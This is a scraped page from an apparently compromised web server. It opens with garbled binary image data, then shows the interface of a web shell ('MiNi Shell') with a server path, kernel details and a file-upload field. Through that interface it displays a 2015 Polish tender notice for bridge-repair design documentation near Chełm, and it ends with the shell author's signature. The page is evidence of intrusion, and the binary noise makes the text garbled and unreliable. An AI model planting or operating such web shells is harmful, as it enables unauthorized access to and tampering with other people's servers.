JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150521/73475-N-2015.html

<p class="kh_header"><b>Chełm: Wykonanie dokumentacji projektowej na remont mostu w m. Zagroda w km 14+981 drogi wojewódzkiej Nr 843 Chełm-Kraśniczyn-Zamość administrowanej przez Rejon Dróg Wojewódzkich w Chełmie</b><br>
<b>Numer ogłoszenia: 73475 - 2015; data zamieszczenia: 21.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich w Lublinie Rejon Dróg Wojewódzkich w Chełmie , ul. Lwowska 24, 22-100 Chełm, woj. lubelskie, tel. 082 5603123, faks 082 5603123.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej na remont mostu w m. Zagroda w km 14+981 drogi wojewódzkiej Nr 843 Chełm-Kraśniczyn-Zamość administrowanej przez Rejon Dróg Wojewódzkich w Chełmie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres usługi
1) Wykonanie dokumentacji projektowej (budowlanej i wykonawczej) na remont mostu 
w m. Zagroda w km 14+981 drogi wojewódzkiej Nr 843 Chełm-Kraśniczyn-Zamość, 
zakres projektowanych robót obejmuje:
a.  odciążenie i zabezpieczenie nasypu drogowego za przyczółkami słupowymi oraz
     zabezpieczenie skarp nasypu bezpośrednio przy moście,
b.  naprawę powierzchni betonowych mostu.
Parametry mostu
a.  długość konstrukcji       5,4 m
b.  szerokość konstrukcji   9,0 m
c.  szerokość jezdni           8,0 m
Skład dokumentacji
a. wykonanie projektu budowlanego     w  4 egz. w tym 1  w wersji elektronicznej
    na nośniku płyta CD/DVD
b. wykonanie projektu wykonawczego  w  4 egz. w tym 1  w wersji elektronicznej
    na nośniku płyta CD/DVD   zawierającego:
    -kosztorys inwestorski,
    -kosztorys ofertowy,
    -przedmiar robót,
    -specyfikacje techniczne wykonania i odbioru robót budowlanych. 
c. wykonanie projektu organizacji ruchu na czas prowadzonych robót związanych z
    remontem mostu zatwierdzony przez właściwe organy zarządzające ruchem 
    w  4 egz.  w tym 1  w wersji elektronicznej (na nośniku płyta DVD).
    Roboty będą prowadzone po obiekcie przy odbywającym się ruchu pojazdów.
3.  Wykonawca swoim staraniem uzyska  i poniesie koszty wszelkich niezbędnych do projektowania danych wyjściowych, materiałów, warunków technicznych, uzgodnień 
i decyzji. 
4. Dokumentacja projektowa służyć będzie realizacji późniejszych robót związanych 
z remontem mostu, winna zawierać wszystkie uzgodnienia wymagane przy realizacji robót budowlanych. 
1) Projekt budowlany i wykonawczy, specyfikacje techniczne wykonania i odbioru robót budowlanych, przedmiar robót - zakres i forma opracowane zgodnie z Ustawą 
z dnia 7 lipca 1994r. Prawo budowlane (Dz.U. Nr 243 z 2010 poz.1623 z póżn. zm.) 
wraz z przepisami wykonawczymi wydanymi na podstawie art. 34 ust. 6 pkt. 1 w/w ustawy.
2) Kosztorys inwestorski opracowany na podstawie Rozporządzenia Ministra Infrastruktury 
z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego (Dz.U.2004r. Nr.130 poz.1389).
5. Przy opisywaniu rozwiązań projektowych Wykonawca nie będzie wskazywał znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfiką 
przedmiotu zamówienia lub gdy nie może opisać urządzenia lub materiału za pomocą dostatecznie dokładnych określeń. W przypadku takiego wskazania jak powyżej, we wszystkich dokumentach wchodzących w skład przedmiotu zamówienia, należy zawrzeć określenie /lub równoważny/, co w  konsekwencji powoduje, że wymieniony konkretny produkt otrzymuje charakter jedynie przykładowy.   W przypadku zastosowania rozwiązań równoważnych Wykonawca zobowiązany jest podać parametry równoważności. 
Ponadto Wykonawca przy opisywaniu rozwiązań projektowych zobowiązany jest do stosowania art. 30 ustawy Pzp. 
Wykonawca, który powołuje się na rozwiązania równoważne opisywane przez
Zamawiającego jest obowiązany wykazać, że oferowane usługi spełniają wymagania określone przez Zamawiającego.
Wartość zamówienia: 20 000,00 zł netto.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.23.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości: 
                 500 zł.   (słownie złotych:  pięćset)
2. Wadium może być wnoszone w jednej lub kilku następujących formach określonych 
w art. 45, ust. 6 ustawy Prawo zamówień publicznych.
1)  pieniądzu,
2)  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)  gwarancjach bankowych,
4)  gwarancjach ubezpieczeniowych
5)  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt.2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
(Dz. U. z 2007 Nr 42 poz. 275, z późń. zm.).
3. Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto ZDW 
w Lublinie w   Banku PKO Bank Polski S.A. nr 74 1020 3147 0000 8002 0105 5730.
W tytule przelewu napisać:  wykonanie dokumentacji projektowej RDW Chełm
4. W ofercie należy złożyć dokument potwierdzający wniesienie wadium.
UWAGA:
1.	Wadium w pieniądzu należy wnosić ściśle z dyspozycją art. 45 ust. 7 ustawy Prawo zamówień publicznych, tzn. /przelewem na rachunek bankowy wskazany przez zamawiającego/. W myśl art. 63. ust. 3 pkt.1  ustawy Prawo bankowe z dnia 29 sierpnia 1997 (Dz. U z 2012 poz. 1376)  polecenie przelewu jest jedną z form 
rozliczenia bezgotówkowego. Zgodnie z art. 63 c) Prawa bankowego polecenie przelewu stanowi udzieloną bankowi dyspozycję dłużnika obciążenia jego rachunku określoną kwotą i uznania tą kwotą rachunku wierzyciela. 
Oznacza to, że wpłata gotówkowa wadium wnoszona na poczcie lub 
w banku nie stanowi polecenia przelewu w rozumieniu wyżej cytowanych artykułów.
2.	Wadium wnoszone przelewem (art. 45 ust. 7 ustawy pzp) uważa się za 
wniesione w terminie jeżeli wpłynie na konto ZDW w Lublinie przed upływem terminu składania ofert. 
3.    W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (spółki cywilne, konsorcja)  treść gwarancji, w miejscu gdzie wskazany jest 
podmiot, na którego zlecenie udzielana jest gwarancja, winna wskazywać 
wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
4.  Zamawiający zatrzymuje wadium wraz z odsetkami w przypadkach określonych 
      w art. 46 ust. 4a i 5 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunku udziału polegającego na  posiadaniu wiedzy i doświadczenia w oparciu o załącznik-Wykaz wykonanych usług.  Warunek ten zostanie uznany za spełniony, gdy Wykonawca wykaże, że 
w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  -w tym okresie,  wykonał co najmniej 1 usługę polegającą na opracowaniu dokumentacji projektowej  na remont lub budowę/przebudowę obiektu mostowego o wartości  minimum  20.000 zł. brutto (dwadzieścia tysięcy) 
i  udokumentuje, że usługi te zostały wykonane należycie. 
3.  W przypadku gdy Wykonawca będzie polegał na wiedzy i doświadczeniu  innych podmiotów Zamawiający żąda dołączenia do oferty pisemnego zobowiązanie tego podmiotu do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania 
z nich przy wykonaniu zamówienia. Przez pisemne zobowiązanie podmiotu trzeciego rozumie się oryginał zobowiązania lub kserokopię zobowiązania poświadczoną za zgodność z oryginałem przez ten podmiot ( zgodnie z wyrokami KIO nr: KIO 786/11; KIO 787/11; KIO 797/11; KIO 830/11; KIO 1008/11).
Uwaga:
Zobowiązanie podmiotu trzeciego do oddania Wykonawcy do dyspozycji niezbędnych zasobów winno posiadać formę pisemną, stosowną treść, z której będzie wynikało, że podmiot ten zobowiązał się do udostępnienia określonych zasobów na okres korzystania z nich przy wykonywaniu zamówienia oraz dla swej skuteczności musi zostać złożone przez osobę/osoby uprawnioną do reprezentowania podmiotu trzeciego w powyższym zakresie. Zobowiązanie złożone przez osobę nieuprawnioną nie dowodzi udostępnienia przez podmiot trzeci (zgodnie z wyrokiem KIO 2213/11). 
4. Zgodnie z § 1 ust. 6 pkt. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 
19 lutego 2013r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. 2013, poz. 231), jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zamawiający w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę 
z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać: 
dokumentów dotyczących w szczególności:
a)	zakresu dostępnych wykonawcy zasobów innego podmiotu,
b)	sposobu wykorzystania  zasobów innego podmiotu, przez wykonawcę, przy 
         wykonywaniu zamówienia,
c)	charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d)      zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia w/w warunki udziału mogą być spełnione łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto oprócz oświadczeń lub dokumentów jakie należy dostarczyć w celu potwierdzenia spełniania warunków udziału, Wykonawca obowiązany jest dołączyć do oferty:
1) Dowód wniesienia wadium     -wadium wnoszone w formie innej niż pieniądz (art. 45 
ust.6 pkt. 2-5 ustawy Prawo zamówień publicznych) musi być złożone 
w formie oryginału.
2) Ofertę przetargową (z ceną netto i z podatkiem VAT).
3) Wykaz części zamówienia, których wykonanie Wykonawca powierzy podwykonawcy .  
4)   W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do oferty należy załączyć dokument (np. odpowiednią umowę) ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania 
w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art. 23 
ust. 1 i 2 ustawy Prawo zamówień publicznych.
5)  W przypadku podpisania oferty i innych dokumentów prze osobę/osoby, które nie są wymienione w odpisie z właściwego rejestru do oferty należy dołączyć dokument potwierdzający prawo do reprezentowania podmiotu przez osobę/osoby podpisujące ofertę.
6) Dokumenty należy sporządzić  zgodnie ze wzorami dołączonymi do SIWZ i w sposób wymieniony w pkt. XI.2. 
7) Pełnomocnictwo należy złożyć w formie oryginału lub kopii potwierdzonej notarialnie. 
8) Pisemne zobowiązanie podmiotu trzeciego należy złożyć w oryginale lub kopii poświadczonej za zgodność z oryginałem przez ten podmiot.
9) Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski. 
Pozostałe dokumenty mogą być złożone w oryginale lub  kopii potwierdzonej 
za zgodność z oryginałem  przez osoby uprawnione do składania oświadczeń woli, wymienione w pkt. XI.2.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Skrócenie terminu wykonania zamówienia - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 Ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty polegających na:
1) zmianie dotyczącej wynagrodzenia w przypadku gdy zmianie uległy stawki podatku VAT -wynagrodzenie ulegnie zmianie w ten sposób, że wynagrodzenie netto pozostanie takie samo, a wartość podatku VAT i wynagrodzenie brutto ulegnie zmianie,
2)  zmianach podwykonawcy -podmiotu, na którego zasoby Wykonawca powoływał się w złożonej ofercie, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu - w przypadku akceptacji przez Zamawiającego wskazanego innego podwykonawcy po wykazaniu, iż proponowany inny podwykonawca spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia,
3) rezygnacji z podwykonawcy -podmiotu, na którego zasoby Wykonawca powoływał się w złożonej ofercie, na zasadach określonych w art. 26 ust. 2b,  w celu wykazania spełniania warunków udziału w postępowaniu - w przypadku wykazania Zamawiającemu, iż Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia,
4) powierzeniu podwykonawcy realizacji części zamówienia - w przypadku, gdy Wykonawca w ofercie nie wskazał  części, którą na etapie realizacji zamówienia zamierza powierzyć podwykonawcy. W takim przypadku wykonawca winien stosować zasady wynikające z § 8 ust.  1-5 umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdw.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejon Dróg Wojewódzkich w Chełmie, 22-100 Chełm, ul. Lwowska 24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2015 godzina 10:00, miejsce: Rejon Dróg Wojewódzkich w Chełmie, 22-100 Chełm, ul. Lwowska 24 /sekretariat/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający 
i Wykonawcy przekazują za pomocą  faksu nr (082) 560 31 20;  lub drogą 
elektroniczną na adres e-mail: rdw.chelm@zdw.lublin.pl
Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
Osoby uprawnione do porozumiewania się z wykonawcami 
1. W sprawach formalno-prawnych związanych z postępowaniem o udzielenie zamówienia 
i  zawarciem umowy - Bożena Białkowska, Jerzy Jaskóła, tel. (082) 560-31-23
2. W  zakresie przedmiotu zamówienia  -  Jan Janasiak
UWAGA:
Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej zamawiającego lub w inny sposób i zamierzają ubiegać się o udzielenie zamówienia, mogą przesłać krótką informację faksem lub pocztą elektroniczną zawierającą podstawowe dane firmy (nazwa, adres, numer tel. i faksu, adres poczty elektronicznej). Wykonawcy, którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez zamawiającego indywidualnie (bezpośrednio) zawiadamiani o np.: zapytaniach, wyjaśnieniach i zmianach dotyczących specyfikacji istotnych warunków zamówienia, przedłużeniu terminu składania ofert..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com